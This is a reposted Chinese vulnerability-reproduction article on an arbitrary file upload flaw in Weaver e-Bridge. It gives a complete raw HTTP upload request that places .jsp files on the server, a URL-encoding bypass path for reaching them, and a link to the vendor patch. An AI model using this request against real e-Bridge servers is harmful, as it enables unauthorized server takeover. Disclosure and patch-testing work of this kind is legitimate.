泛微云桥ebridge最新文件上传漏洞利用(含POC及绕过)

admin 2024年8月6日14:19:51评论216 views字数 1164阅读3分52秒阅读模式

 

漏洞简介

泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。攻击者可通过任意文件上传漏洞上传文件,获取服务器权限。

漏洞利用

具体原理可以移步至这位师傅的文章:xxx系统漏洞简单分析 (qq.com)

上传POC如下:

POST /wxclient/app/recruit/resume/addResume?fileElementld=111 HTTP/1.1Host: Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cookie: EBRIDGE_JSESSIONID=6E01926E757A8B0BE87DAA2EACC80EF6Connection: keep-aliveContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryDOVhr5SwLI1wpry7Content-Length: 264------WebKitFormBoundaryDOVhr5SwLI1wpry7Content-Disposition: form-data; name="file";filename="1.jsp"1------WebKitFormBoundaryDOVhr5SwLI1wpry7--Content-Disposition: form-data; name="file";filename="2.jsp"1------WebKitFormBoundaryDOVhr5SwLI1wpry7--

泛微云桥ebridge最新文件上传漏洞利用(含POC及绕过)

访问/upload/{时间年月,如:202408}/{随机大写字母}/1.js%70

泛微云桥ebridge最新文件上传漏洞利用(含POC及绕过)

星球分享利用参考脚本演示如下:

泛微云桥ebridge最新文件上传漏洞利用(含POC及绕过)

修复建议

安装相关补丁:https://wx.weaver.com.cn/download/security

原文始发于微信公众号(良月安全):[漏洞复现]泛微云桥ebridge最新文件上传漏洞利用(含POC及绕过)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月6日14:19:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微云桥ebridge最新文件上传漏洞利用(含POC及绕过)http://cn-sec.com/archives/3038470.html

发表评论

匿名网友 填写信息